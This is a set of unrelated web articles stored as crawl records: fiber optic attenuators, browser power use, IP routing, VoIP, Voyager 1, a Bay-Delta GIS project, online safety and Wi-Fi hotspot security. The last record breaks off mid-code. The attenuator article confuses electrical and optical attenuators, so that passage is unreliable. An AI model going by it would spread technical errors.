Most EU sites are soon obliged to inform about cookies set on the users' equipment. Information must be in accordance with "Notice of requirements for information and consent for storing and accessing information in end-user terminal equipment", which is part of an EU directive on the protection of privacy in electronic communications. | <urn:uuid:5fb2bfd3-8197-4086-a005-f6d83a65b2a5> | CC-MAIN-2017-04 | https://heimdalsecurity.com/en/cookies | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00543-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.916499 | 698 | 2.796875 | 3 |
A fiber optical attenuator is a device used to reduce the power level of an optical signal in a fiber optic communication system. In optical fiber, this transmission loss is known as attenuation, and it is an important factor limiting the transmission of a digital signal over large distances. An optical attenuator reduces the optical signal as it propagates along free space or an optical fiber.
There are several basic types of fiber optical attenuator. Fixed attenuators reduce light signals by a set amount with negligible or no reflection. Because signal reflection is not an issue, fixed attenuators are well suited to precise data transmission. Fixed attenuators are also often used to improve inter-stage matching in an electronic circuit. Thorlabs' fixed attenuators range from 5 dB to 25 dB. Mini-Circuits' fixed attenuators are packaged in rugged plug-in models, available in both 50- and 75-ohm versions spanning 1 to 40 dB, DC to 1500 MHz.
A variable optical attenuator is a dual-window (1310/1550 nm) passive component that can continuously and variably attenuate the light intensity in an optical fiber transmission. A variable fiber optic attenuator can simulate distance or actual attenuation in fiber optic testing work by inserting a calibrated attenuation into the link.
In some variable optical attenuator designs, fixed resistive elements are replaced with electronic devices such as the metal-semiconductor field-effect transistor and PIN diodes. A variable optical attenuator attenuates the light signal or beam in a controlled manner, producing an output optical beam with a different, attenuated intensity. The attenuation is the power ratio between the light beam leaving the device and the light beam entering the device, and in a variable attenuator that ratio is adjustable. Variable optical attenuators are typically used in fiber optic communication systems to regulate optical power, preventing the damage to optical receivers that irregular or fluctuating power levels can cause. The price of a commercial variable optical attenuator depends on the production technology used.
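Whether fixed or variable, the attenuation level is specified in decibels, which express a power ratio on a logarithmic scale. A quick sketch of what a given dB figure means for optical power:

```python
def attenuated_power(p_in_mw, attenuation_db):
    """Output power after an attenuator: dB = 10 * log10(P_in / P_out),
    so P_out = P_in / 10**(dB / 10)."""
    return p_in_mw / (10 ** (attenuation_db / 10))

print(attenuated_power(1.0, 3))   # ~0.5 mW: 3 dB roughly halves the power
print(attenuated_power(1.0, 10))  # 0.1 mW: 10 dB is a factor of ten
print(attenuated_power(1.0, 30))  # 0.001 mW: a 30 dB fixed attenuator
```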
FiberStore is an online shop supplying fiber optic attenuators with FC, SC, ST, LC, MU, PC, UPC, FC/APC, SC/APC and LC/APC connectors, including fixed-value plug-type fiber optic attenuators with attenuation levels from 1 dB to 30 dB. You can buy fiber optic connection products from our store with confidence; all of our fiber optic supplies offer high quality at a low price.
Summer's approaching, and with it energy bills are going up. And if you want to cut your PC's power bill, you should use--Microsoft's Internet Explorer?
That's the result of a Microsoft-sponsored study (PDF) by Fraunhofer, which found that Internet Explorer consumed less power than both Chrome and Mozilla's Firefox when accessing the Web's top ten sites.
Watt's the difference?
Unfortunately for Microsoft's case, the differences are minuscule--on the order of about a watt when laptops were measured surfing Web sites, or just 2 percent or so between the other two.
When using Flash, however, the differences are more pronounced: Microsoft's Internet Explorer uses 18.6 percent less power than Chrome, Microsoft said.
That's not to say that Microsoft let that small fact stop it from extrapolating the massive energy savings if only the nation's computing population could be converted over to its browser. Redmond said the energy saved could power 10,000 households in the United States for a year, or provide the carbon reduction equivalent of growing 2.2 million trees for 10 years.
Fraunhofer didn't explain exactly why the browsers' power consumption differs, although it's presumably tied to the number of CPU cycles consumed over time. The implication is that IE is more power-efficient than the other browsers, even if it may not be the absolute fastest.
HTML5 power processing
Nevertheless, the Fraunhofer study found another interesting angle: the processing power needed to render a site coded in HTML5 could far outpace that of a normal Web site.
"Testing of two HTML5 websites (one benchmark, one video) and one Flash video found that both appear to increase power draw significantly more than the top ten websites tested," the study said. "Most notably, the HTML5 benchmark test condition more than doubled the notebook power draw for all computers and browsers tested, while desktop power draw increased by approximately 50 percent."
Unfortunately, Fraunhofer didn't perform enough tests to conclusively prove that an HTML5 site would consume more power, perhaps because a CPU-intensive benchmark was included. The firm said that more testing was needed.
This story, "Microsoft claims IE consumes less power than other browsers" was originally published by PCWorld. | <urn:uuid:78a400ac-1211-48b7-9d81-611d064d616f> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2167022/applications/microsoft-claims-ie-consumes-less-power-than-other-browsers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00443-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933139 | 500 | 2.84375 | 3 |
Mamadou Barab Samb is a Global Knowledge instructor who teaches and blogs from Global Knowledge Egypt.
According to the OSI layer concept, routing, or best path selection, takes place on Layer 3 and is based on the logical address. In this post, we want to discuss some of the points in that statement.
What is Layer 3?
To make design and troubleshooting easier, and to bring all vendors onto a common platform to achieve compatibility and interoperability, the concept of network models was created. The OSI model is one of those models; it is composed of seven layers, each playing a strict role in the data delivery process.
Layer 3, the Network Layer, is responsible for finding the right path for the data packet to reach its destination based on logical addresses (that is, addresses not physically built into the network node).
But why do we need those Logical Addresses?
Despite the existence of physical addresses (like MAC addresses) on each of the network nodes, we still need to configure logical addresses, even though we know that the delivery of the message is still based on that physical address. Logically, you have to wonder why you need to set an IP address for your host if frames are delivered to it based on its MAC address. Simply put, you configure IP addresses for efficient routing: they allow the construction of a database of entries that represent node addresses in a summarized way (one network ID representing multiple nodes).
Yes, routing starts on your own PC, where an ANDing process takes place to determine whether the communicating device is local or remote and to define the MAC address that will be used to deliver the frame.
You can view your PC routing table by issuing the command ROUTE PRINT on your command prompt.
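That ANDing step can be illustrated with a short sketch: the host ANDs the source and destination addresses with its subnet mask, and equal network IDs mean the destination is local (the frame goes straight to the destination's MAC), while different network IDs mean it is remote (the frame goes to the default gateway's MAC). The addresses below are illustrative only.

```python
import ipaddress

def is_local(src_ip, netmask, dest_ip):
    # AND the source address with the mask to get the local network ID,
    # then check whether the destination falls inside that network.
    network = ipaddress.ip_network(f"{src_ip}/{netmask}", strict=False)
    return ipaddress.ip_address(dest_ip) in network

# Same network ID: deliver directly to the destination's MAC address.
print(is_local("192.168.1.10", "255.255.255.0", "192.168.1.99"))  # True
# Different network ID: hand the frame to the default gateway.
print(is_local("192.168.1.10", "255.255.255.0", "8.8.8.8"))       # False
```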
Why do we need routing?
Simply, because each device is only aware of the networks it is connected to, it needs to discover the remote ones. Routers are the dedicated devices that handle packets sent by network nodes to fellow nodes. To succeed in this handling process, routers have to be aware of all the distant addresses, and this is done by constructing a forwarding database called a routing table. That table contains the network IDs, the path through which the router can reach them (exit interface, next hop), and the cost or distance of those routes (metrics).
How do we achieve routing?
Successful routing depends on all the possible networks being present in the routing database. You may wonder how the router can learn about all these networks. In STATIC ROUTING, it's the administrator's job to let the routers know about remote networks by entering them manually into the routing database. Obviously this can only be done when there are a limited number of entries; otherwise, in the case of a huge network, DYNAMIC ROUTING PROTOCOLS are used.
Each of those protocols calculates the network path distance (Metric) in its own way. Some use the number of routers to cross (like RIP), some use the speed of the links to cross (like OSPF), and some use the speed and delay of the links to cross (like EIGRP).
How do we determine the best path?
In the process of constructing the routing database, the router may face the issue of selection when multiple paths are proposed to it by several fellow routers. In that case, the router asks two important questions: What’s the most trusted source? And what’s the lowest distance? Obviously, and based on what we discussed earlier on how routing protocols calculate path distance, the router uses this trust preference order:
- ITSELF (connected routes)
- The Administrator (Static routes)
- RIP routes (there are more than three dynamic routing protocols and so the preference list is much longer)
This trust preference order is called Administrative Distance.
What if the router has several possible paths to the same destination from the same routing source? Here the second question, what’s the lowest distance route, acts as a tie breaker, and a distance preference order is used based on a Metric value.
Now the final case is what if the packet received by the router matches several entries in the same database? Here a third question has to be asked: What's the most specific entry? This is determined by using the entry with the longest prefix, or most matching bits.
But what if the packet matches multiple entries with the same number of matching bits? The router load balances the packets across the possible forwarders. Meaning that if the router receives, let's say, twenty packets and has four different matching paths, it will divide the load (the packets) to make the routing process faster and more efficient, which results in better network performance.
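The whole selection order discussed above — most specific entry first, with administrative distance and metric as tie breakers — can be condensed into a small sketch. The route entries and distance values below are illustrative, not taken from any real router.

```python
import ipaddress

# Hypothetical routing table: (prefix, administrative distance, metric, source)
ROUTES = [
    ("10.0.0.0/8",  120,  3, "RIP peer"),
    ("10.1.0.0/16",   1,  0, "static"),
    ("10.1.2.0/24", 110, 20, "OSPF peer"),
]

def best_route(dest):
    addr = ipaddress.ip_address(dest)
    matches = [r for r in ROUTES if addr in ipaddress.ip_network(r[0])]
    # Most specific entry (longest prefix) wins; administrative distance
    # and metric (lower is better for both) break any remaining ties.
    return max(matches,
               key=lambda r: (ipaddress.ip_network(r[0]).prefixlen, -r[1], -r[2]))

print(best_route("10.1.2.5")[3])  # "OSPF peer": the /24 is the most specific
print(best_route("10.1.9.9")[3])  # "static": the /16 beats the /8
```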
The amazing paper maps created by National Geographic over the years will be included with Google Maps under a new public data program.
Google Maps is now gaining some spectacular map imagery from the National Geographic Society, which is contributing some 500 of its maps to Google Maps' new public data program.
The addition of the National Geographic maps was unveiled by Frank Biasi, director of digital development for National Geographic Maps, in a Dec. 6 post on the Google Lat Long Blog.
Under the newly launched Google Maps Engine public data program, organizations can now distribute their map content to consumers using Google's cloud infrastructure, according to Google. And that's where National Geographic's contribution comes in, bringing digital images of many of the long-popular printed maps that are often tucked inside the latest issues of the magazine.
"Founded in 1888, National Geographic Society aims to inspire people to care about the planet," wrote Biasi. "As one of the world's largest nonprofit scientific and educational organizations, we've funded more than 10,000 research, conservation and exploration projects. Maps and geography are integral to everything we do; it's even part of our name. Over our long history, we've created and published more than 800 reference, historic and travel maps."
And since many of those maps over time have been collected and saved by recipients, they stay alive for many people. But the rest of the world can't access them when they are stored in attics and basements, so National Geographic decided to join Google Maps' new program, wrote Biasi. "The public data program gives us the opportunity to release our amazing map collection to the wider world."
To do that, National Geographic will also use Google Maps Engine "to overlay our maps with interactive editorial content, so the maps can 'tell stories' and raise awareness about environmental issues and historic events," he wrote. "Anyone will be able to access our free public maps, but we also plan to sell or license high-resolution and print versions to raise funds for our nonprofit mission."
Biasi wrote that by partnering with Google Maps, his group hopes that it will "help our maps get discovered by more people, including National Geographic fans, students and educators and travelers. We expect travel and home decor businesses, publishers and brand marketers will also want to buy or license them."
National Geographic will use many of Google Maps' broad features to digitize and share the maps, including data, layers, combining layers into maps, publishing individual layers as maps and integrating multiple maps, he wrote. "We use both the raster and vector capabilities to put descriptors, links, pop-ups and thumbnails on top of maps. For example, we could use Maps Engine to add articles, photography and information from National Geographic expeditions to our ocean maps. These interactive maps, which we can display in 2D or 3D using Maps Engine, will allow people to follow along with expeditions as they unfold or retrace past expeditions."
By putting the selected maps into Google Maps, the group will now be able to "turn our maps into interactive full-screen images that can be panned and zoomed and overlaid with tons of great data," wrote Biasi. "We are proud of our century-long cartographic tradition. The Maps Engine public data program will help get our maps out into the world where more people can enjoy and learn from them."
The Google Maps Engine public data program provides advanced tools that allow map producers to publish their public mapping content to the world, according to Google. "By enabling you to unlock your mapping data, together we can organize the world's geospatial information and make it accessible and useful."
Organizations that produce maps, such as public data providers and governments who have content in the public good, can apply to participate in the program, according to Google.
In October, Google released Google Maps Engine Pro to make it easier for businesses to use online maps to attract customers and new revenue. The new professional mapping tool lets businesses visualize their huge amounts of critical data on maps so they can take advantage of the new resources the data provides, according to Google. Google Maps Engine Pro was built as an application on top of the Google Maps Engine platform, which provides businesses with cloud-based technology to help them organize large datasets and create more complex maps.
In July, Google Maps unveiled a new maps layer for developers so that they can better integrate their data with images in Google Maps. The innovative DynamicMapsEngineLayer gives developers the ability to perform client-side rendering of vector data, allowing developers to dynamically restyle the vector layer in response to user interactions like hover and click, according to the company. The new maps layer makes it easier for developers to visualize and interact with data hosted in Google Maps Engine.

In June, Google for the first time released its Google Maps Engine API to developers so they can build consumer and business applications that incorporate the features and flexibility of Google Maps. With the Maps API, developers can now use Google's cloud infrastructure to add their data on top of a Google Map and share that custom mash-up with consumers, employees or other users. The API provides direct access to Maps Engine for reading and editing spatial data hosted in the cloud, according to Google.
Today, we’d like to get back to a few basics about the relationship between the public-switched telephone network and voice over IP.
The PSTN includes a signaling system, a series of central offices and a distribution network. The PSTN employs a packet-based network called Signaling System 7 (SS7) or Common Channel Signaling System 7 (CCSS7) to determine the best call route, connect the callers and control calls. Private voice network systems like PBX and key systems work with the PSTN to create a hybrid public/private network.
Using IP to signal and transport voice brings several fundamental shifts to traditional voice communications. In the legacy PSTN environment, unused bandwidth cannot be shared; using packetized transmission (like an IP packet) for voice shares unused bandwidth and allows for greater efficiency, thereby reducing cost. IP is the packet protocol of choice for voice because the overall volume of users’ WAN traffic is dominated by IP.
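To see why packetization changes the economics, it helps to work out the per-call numbers. The sketch below assumes a G.711 codec (64 kbps of voice payload) sent in 20 ms packets with roughly 40 bytes of IP/UDP/RTP headers per packet; the figures are illustrative. Unlike a TDM circuit's permanently reserved channel, this IP bandwidth is only consumed while packets are actually being sent, so idle capacity can be shared with other traffic.

```python
def voip_bandwidth_kbps(payload_kbps=64, packet_ms=20, header_bytes=40):
    """Approximate on-the-wire bandwidth per call, per direction."""
    payload_bytes = payload_kbps * 1000 / 8 * (packet_ms / 1000)  # bytes/packet
    packets_per_sec = 1000 / packet_ms
    return (payload_bytes + header_bytes) * packets_per_sec * 8 / 1000

print(voip_bandwidth_kbps())  # ~80 kbps: 64 kbps of voice plus header overhead
```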
In the PSTN, voice network features are delivered to a user on a static pair of copper wires to a static local central office switch or PBX. VoIP allows the traditionally switched services to be delivered to a user anywhere the user is connected.
The three most common ways to deploy private VoIP include the use of VoIP gateways, VoIP-enabled routers or an IP-PBX.
VoIP gateways represent one of the easiest ways to deploy VoIP. A gateway transforms SS7 signaling and traditional voice transmissions into IP-based signaling and transmission techniques. By installing a gateway, a business can connect to an IP or other data network and a TDM network simultaneously.
VoIP-enabling routers means adding a gateway function to a router. Routers can be upgraded to include the gateway and voice-specific features.
IP-PBX and IP-enabled PBX deployments are similar in that they start with PBX features and include a gateway function.
Steve and Larry have co-authored a technology backgrounder about basic telephony and VoIP. If you’d like to read more about the basics or see a presentation featuring Steve and Larry, please see the links below. | <urn:uuid:20173c51-fd95-4e42-90eb-488a78dbf9e6> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2324219/lan-wan/how-voip-relates-to-the-pstn.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00075-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.910645 | 446 | 2.5625 | 3 |
After 35 years of travel, NASA’s Voyager 1 space probe left our Solar System on Aug. 25, 2012, NASA recently announced. This makes Voyager 1 the first known man-made object to travel into interstellar space. The probe is now 12 billion miles from the sun and capturing sounds, and the first sound clip has been released by NASA. As of this year, the probe is traveling at a relative velocity to the sun of 11 miles per second. By 2025, the probe will not have enough energy to power any of its instruments. | <urn:uuid:feea8516-9081-413c-9ed0-9c1ae8203706> | CC-MAIN-2017-04 | http://www.govtech.com/question-of-the-day/Question-of-the-Day-for-091613.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00561-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937014 | 110 | 3.328125 | 3 |
The need for environmental awareness and stewardship by individual government employees is increasing. Several states are enacting legislation calling for reduced carbon emissions and encouraging the use of energy from renewable sources. With this increased awareness comes the increased desire to do something to positively influence the impact of human activity on the planet.
According to widely accepted estimates, IT operations account for two percent of global carbon dioxide emissions-the same as the airline industry. Not to mention the heaps of cell phones and computer equipment that the United States throws away every year. And the information technology industry is expected to grow by 150 percent in the next few years.
So while the use of technology grows, government employees can still do something about the environmental impact they have every day. A major component of encouraging that is training. To facilitate that during this economic downturn, online training provider SafetyFirst is providing free training on a variety of topics relating to environmental sustainability. The company is offering the training free to groups of 100 employees or less. In exchange, the company is asking that participants help beta test its SafetyFirst Direct training delivery service.
Course topics include environmental awareness, carbon footprint reduction, used oil disposal and universal waste management. | <urn:uuid:29919de9-3c19-4b6d-bac4-1928b5409697> | CC-MAIN-2017-04 | http://www.govtech.com/education/Company-Offers-Free-Environmental.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00379-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952831 | 238 | 2.609375 | 3 |
Definition: A sort algorithm that works well if many items are in order. First, begin a sublist by moving the first item from the original list to the sublist. For each subsequent item in the original list, if it is greater than the last item of the sublist, remove it from the original list and append it to the sublist. Merge the sublist into a final, sorted list. Repeatedly extract and merge sublists until all items are sorted. Handle two or fewer items as special cases.
See also selection sort, merge sort, UnShuffle sort.
Note: This works especially well with linked lists.
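A minimal Python sketch of the algorithm described above (using plain lists rather than the linked lists the note recommends, so the pops and appends are not as cheap as they could be):

```python
def merge(a, b):
    """Merge two sorted lists into one sorted list."""
    out, i, j = [], 0, 0
    while i < len(a) and j < len(b):
        if a[i] <= b[j]:
            out.append(a[i]); i += 1
        else:
            out.append(b[j]); j += 1
    out.extend(a[i:])
    out.extend(b[j:])
    return out

def strand_sort(items):
    """Repeatedly pull an increasing 'strand' (sublist) out of the
    remaining items and merge it into the sorted result."""
    items = list(items)  # work on a copy of the original list
    result = []
    while items:
        strand = [items.pop(0)]   # begin the sublist with the first item
        rest = []
        for x in items:
            if x >= strand[-1]:   # keeps the sublist in order:
                strand.append(x)  # move it to the sublist
            else:
                rest.append(x)    # otherwise leave it for a later pass
        items = rest
        result = merge(result, strand)
    return result

print(strand_sort([3, 1, 5, 4, 2]))  # [1, 2, 3, 4, 5]
```

Note how a mostly ordered input yields few, long strands and therefore few merge passes, which is why the algorithm "works well if many items are in order."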
Explained in a message about J sort posted in 1997.
Entry modified 24 November 2008.
Cite this as:
Paul E. Black, "strand sort", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 24 November 2008. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/strandSort.html | <urn:uuid:2335e361-8939-45cc-a828-6f937d11588f> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/strandSort.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00195-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.848067 | 285 | 3.78125 | 4 |
The United Nations helps developing countries build infrastructure and protect human rights. Cybersecurity has become a new concern in carrying out those missions.
“One of the fundamental problems that’s come up is the threat of cybersecurity against their critical infrastructure,” says Paul Raines, CISO of the UN Development Programme. “If one country launched a cyber attack to politically intimidate another, it could do significant damage by tampering with the power grid, education, utilities or police facilities.” It’s also a question of human rights to access information and presumption of privacy, he adds. “If they’re spying on citizens or intercepting information – that’s fundamentally an issue of human rights.”
Tips for Staying Safe Online
The online world can be a confusing—even intimidating—place, with new threats emerging on a regular basis. How can you keep yourself safe and still enjoy the benefits that the Internet brings? Armed with just a little knowledge, you can easily and effectively improve the security of your computer and your personal information. Here are some simple tips that will give you the freedom and confidence to take full advantage of the Internet:
Use anti-virus software, and keep it updated.
Computer viruses and Trojans are designed to steal your credit card information and passwords, take over your email and use it for spamming, or even record what you type on your computer. Using anti-virus software and keeping it up-to-date is the best protection against these threats.
Use a personal firewall, and keep it updated.
Hackers constantly create new ways to penetrate your computer. Installing a personal firewall creates a barrier that prevents hackers from accessing your information.
Create strong passwords and change them regularly.
Many people use simple passwords that are easy to remember but make it easy for hackers to gain access to your financial and personal accounts. Making your password more complex will keep you safer online. Think for example of a phrase or a poem and convert the first letters of each word in the phrase into your password.
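The phrase trick above can even be automated, as a sketch only (the substitution table is a made-up example, and you should not reuse a password generated from a published phrase):

```python
def phrase_to_password(phrase):
    """Take the first letter of each word in a memorable phrase and
    apply a few character substitutions to add complexity."""
    subs = {"a": "@", "i": "1", "o": "0", "s": "$"}  # illustrative table
    first_letters = (word[0] for word in phrase.split())
    return "".join(subs.get(c.lower(), c) for c in first_letters)

print(phrase_to_password("correct horse battery staple"))  # "chb$"
```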
Be aware of deceptive emails, pop-ups, and other online scams.
Online criminals will attempt to acquire your personal information by luring you to a website that looks legitimate, but is actually a fake site. If you receive any emails from an unfamiliar source, or any suspicious pop-ups, do not click on the links or open the attachment.
Check the security lock.
Sometimes the presence of a security lock alone is not proof enough that a website is genuine. You can verify that a website is genuine by double-clicking on the lock to display the website’s security certificate. If the name on the certificate and the address of the website do not match, the website might be phony.
Limit the amount of personal information you share online.
Online criminals use social networking sites to gather information to answer the challenge questions most online services require in order to retrieve and change your password. Limit the amount of personal information you publicly share online.
Fraud is always on the move.
Phone scams are gaining popularity again. One type of scam involves phone calls from an automated call center asking you for sensitive information. You should never provide personal information to an unsolicited caller.
Check your online statements frequently.
In order to help ensure that you and your information stay safe, check your online account statements frequently. | <urn:uuid:8c18dc61-778c-4f1f-aad5-1813f5293e68> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-thought-leadership/identity-protection/staying-safe.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00405-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.895877 | 543 | 2.609375 | 3 |
Level of Gvt.: State, Federal
Function: Environmental protection
Problem/Situation: Too much data on Bay Delta
Solution: GIS helps organize and analyze data
Jurisdiction: California Department of Water Resources
Contact: Dept. Water Resources 916/653-7007.
By Alan Jones
California Department of Water Resources
To study the Northern California Bay-Delta ecosystem in depth and come up with a solution to the multiple and conflicting demands for development and preservation on it is nearly an impossible task - but one the California Department of Water Resources (DWR) must help to accomplish. The Bay-Delta includes rivers and streams which flow from the Sierra Nevada mountains to the Pacific Ocean near San Francisco. Monitoring and managing the huge area requires time, commitment and a new way of managing data with a Geographic Information System (GIS).
DWR's Division of Planning performs a variety of support tasks for Delta studies, including computer modeling, analysis and forecasting. But the data contributed by Planning staff is only a portion of what's available on the Delta and what's needed to tackle the region's difficult dilemmas. The question is how to manage enormous amounts of information from many different sources. To help with this Herculean task, a GIS database on the Bay-Delta ecosystem is being created by the Delta Planning Branch's Environmental Support Section.
"The GIS is one of many evolving tools that will help us manage the mass of complex data available," said Richard Breuer, an environmental specialist in Environmental Support coordinating the development of GIS with the University of California, Berkeley. "The system will help the department in working with other state and federal agencies to resolve Delta problems and make better decisions."
Planners will use this GIS to analyze data, make decisions and support those decisions, prepare environmental impact reports and statements, and monitor environmental mitigation in the Delta. They can import data from other public and private groups to build up the database, as well as add data gathered by DWR staff and other agencies working directly in the Delta, such as the state Department of Fish and Game, the State Lands Commission, and the U.S. Bureau of Reclamation.
"It also contains metadata," Breuer said of the GIS program. "That means the program will not only provide the facts but also the background behind those facts, such as: who collected them, what sampling method was used, are the data current and accurate? Metadata can help establish the credibility and significance of the data to be used for analysis."
Breuer prepared the agreement under which the UC Berkeley Center for Environmental Design Research will help develop the Bay-Delta GIS over the next two years. While several Division of Planning people are already familiar with GIS programs, Berkeley will train additional DWR staff to work with the new GIS.
How GIS Works
GIS works something like the human mind. It can take many sets of data and put them together in different combinations. For a researcher who knows what to look for, it can provide visual displays of the relationship between different data.
The technology, Breuer said, is different from other database systems because spatial, rather than linear, data is collected. Each bit of information - whether about wetland, habitat, distribution of a threatened species, location of a well, or land use - is linked by coordinates to the specific place where it exists in the real world. Features such as waterways, soil types or population density are stored in layers so analysts can pick and choose which data are observed.
GIS is a new way of assembling data and making it universally and instantly available. It's like being able to talk to everybody in the global village at once, and selecting specific individuals in the village to tell you what they know.
If an operator, for example, wants data about Twitchell Island, a few keystrokes and a map of the island appears on the PC or Macintosh. The operator can then call up layer after layer of information - presence of endangered plants, soil type, elevation, roads, wellheads, land use. Each set of data superimposes itself on the screen. The operator can also print out the map, or print out data in various forms, or erase layers and add new ones, such as populations, animal life, housing and Native American artifacts.
Putting together different layers of data will give planners a better way to determine and define relationships. The GIS can combine factors such as time, space, and correlations of data sets, and can "weight" different data to produce a variety of results. For example, land and water use analysts use the GIS to study changes in land use patterns over time. Using maps they created to show these patterns during specific periods, they can ask the system to calculate the changes that have occurred over specific areas.
"The GIS will not only automatically calculate the changes and give you the numerical data," explained Breuer, "the systems will also provide you with a map so you can visually look at the areas of changes."
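The land-use change calculation Breuer describes can be illustrated with a toy example. The sketch below (plain Python; the grids, years, and category codes are invented for illustration) overlays two equally sized land-use "layers" for the same cells and tallies what changed, which is the numerical half of the analysis; a real GIS would also render the result as a map:

```python
def land_use_change(layer_then, layer_now):
    """Overlay two equally sized land-use grids (lists of rows) and
    count transitions between categories, GIS-style."""
    changes = {}
    for row_then, row_now in zip(layer_then, layer_now):
        for before, after in zip(row_then, row_now):
            if before != after:
                key = (before, after)
                changes[key] = changes.get(key, 0) + 1
    return changes

# Hypothetical 3x3 grids: W = wetland, F = farmland, U = urban.
grid_1984 = [list("WWF"), list("WFF"), list("FFF")]
grid_1994 = [list("WWF"), list("WFU"), list("FUU")]
print(land_use_change(grid_1984, grid_1994))  # {('F', 'U'): 3}
```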
The Delta, of course, is an extremely complex ecosystem. It is exceedingly important as a major Pacific Coast wetland and a water hub for most of California. The Delta also contains cities, industries and farms; includes transportation routes, public services and utilities; and provides recreation. Because information is needed and available on all these areas, the problem becomes one of deciding how much data to include.
"If all the data were input at two-foot intervals, it would require gigabytes of storage and cost millions of dollars. It would get to the point where there was too much information to process," said Breuer. "The task has to be do-able. You have to consider the scale that's needed. For example, it's enough to know the location of a wetland within 30 feet. Surveyors would need higher precision, but for planning issues, that amount of information is more than adequate for our purposes."
The department is not pioneering with this program. GIS is already used by many local, state and federal agencies including the Army Corps of Engineers and the Soil Conservation Service to analyze Bay-Delta information.
Planning's Land and Water Use Section has been using GIS for two years for spatial analysis of Bay-Delta issues, using a system named GRASS. GRASS, developed by the Corps of Engineers' Construction Engineering Research Laboratory, will be the basis for the Delta Planning work as well. The new system will be able to access, search and download data from UC Berkeley's Center for Environmental Design Research database.
The GIS also holds databases for a number of other DWR programs, including statewide land-use patterns that note changes in agricultural patterns over the decades and rosters of endangered species.
With such a vast database, the GIS will prove its worth beyond its use by the department. In the near future, the system will be accessible to thousands more people via CERES, the California Environmental Resources Evaluation System. CERES, a program of the state Resources Agency, will catalog information about the state's rich and diverse natural and cultural resources and distribute it via the Internet. Using a software program called Mosaic, anyone with access to the Internet can tap into the system, which will also make data accessible from the National Biological Survey and University of California's Sequoia 2000 network.
"All this ready access to such a wealth of information will lead to more informed decision-making," said Breuer. "And for the Delta, it may mean finding some workable long-term solutions that will address all the issues and satisfy all the parties involved."
Reprinted with permission from "DWR News," the newsletter of the California Department of Water Resources. | <urn:uuid:d398d6bc-0937-4375-8982-c7ea341c8671> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Delta-Mapping-With-GIS.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00223-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.936893 | 1,578 | 2.734375 | 3 |
During the Black Hat 2007 Conference, a quick display of hacker technology demonstrated just how secure (or not) Wi-Fi hotspots are. In the middle of a conference presentation, session identifiers and cookies were captured from the internet browser of a random user accessing an unsecured wireless signal. The result? The helpless audience member could only look on as his Gmail inbox was suddenly presented for all to see.
Though this was eye-opening for many, it shouldn’t be. Wireless networks have been insecure for years; in 2006 the University of Cambridge surveyed 2,500 access points of Wi-Fi networks around the University and found 46% were unencrypted (1). An overall estimate puts that number even higher – around 95% (2).
The reason behind the high rate of unsecured hot spots is simple: “People just really don’t care about Wi-Fi security” (1). The general public doesn’t view insecure networks as a problem. People commonly offer to share their connection with friends and neighbors, and log on to public hotspots.
Despite the past apathy regarding unsecured hotspots, there is clearly a reason to be concerned. Connecting to an unsecured network is an invitation for hackers to easily snoop through people’s inbox and cookies, putting an unsuspecting user at risk for data and identity theft.
The convenience of public Wi-Fi hotspots mistakenly puts security on the back burner. Few are willing to sacrifice checking their email in the library or a coffee shop due to the potential threat of a hacker. But increasingly, hackers are creating fake access points that appear to be real, easily deceiving wireless internet users.
“If you’re connecting to a hacker’s fake Access Point and everything you send and receive is transmitted in clear text with no encryption… Anyone who doubts that this is a problem should ask themselves if they would post their email account passwords … at the bottom of this blog or go in to an airport and yell out their user account names and passwords as loud as they can. If the answer is no then they should be concerned with Hotspot security” (3).
Current Wi-Fi statistics indicate that wireless internet use will only increase. Wireless users are expected to grow by over 970 million users in the next three years, bringing the number of Americans with wireless subscriptions up to 87% (4). By 2010 wireless internet use will double that of cell phone use (5).
These astounding figures should create some unease. The high number of unsecure connections increases the potential for data and identity theft, as well as the loss of control of sensitive information.
Though the new attitude towards Wi-Fi has recently shifted towards concern, the low use of encryption is still a problem. Many wireless network products have included built-in security features that offer added protection or encryption, but customers struggle with the setup, and the features go unused.
Setting up your own network
When setting up Wi-Fi at home, follow these guidelines to increase the security of the network:
• Change the default name of your access point to one that does not read "Linksys" or "Netgear," for example, and that does not disclose your name, company, or location
• Make sure your Wi-Fi Protected Access (WPA) is enabled or turned on, and check often for security upgrades
• Change the default router password
• Disable remote access via the router
• Use MAC authentication to validate only a specific list of users allowed to access your network
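The MAC-authentication point above amounts to an allow-list check. Routers implement this in firmware, but the logic is simple enough to sketch (Python; the addresses are made up):

```python
# Hypothetical allow-list, stored in canonical lowercase-colon form.
ALLOWED_MACS = {"00:1a:2b:3c:4d:5e", "00:1a:2b:3c:4d:5f"}

def normalize_mac(mac):
    """Accept common MAC spellings (colons, dashes, mixed case)."""
    return mac.lower().replace("-", ":")

def may_connect(mac):
    """Admit a client only if its hardware address is on the list."""
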